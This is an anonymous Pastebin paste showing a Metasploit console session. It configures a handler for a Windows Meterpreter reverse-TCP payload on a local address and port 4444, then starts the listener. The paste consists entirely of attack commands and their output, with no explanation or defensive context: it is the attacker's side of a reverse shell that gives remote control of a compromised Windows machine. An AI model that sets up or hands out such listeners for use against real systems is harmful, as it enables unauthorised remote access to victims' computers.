Advertisement
Guest User

Untitled

a guest
Mar 30th, 2017
55
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.33 KB | None | 0 0
  1. msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
  2. PAYLOAD => windows/meterpreter/reverse_tcp
  3. msf exploit(handler) > set LHOST 192.168.1.100
  4. LHOST => 192.168.1.100
  5. msf exploit(handler) > set LPORT 4444
  6. LPORT => 4444
  7. msf exploit(handler) > exploit
  8. [*] Starting the payload handler...
  9. [*] Started reverse handler
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement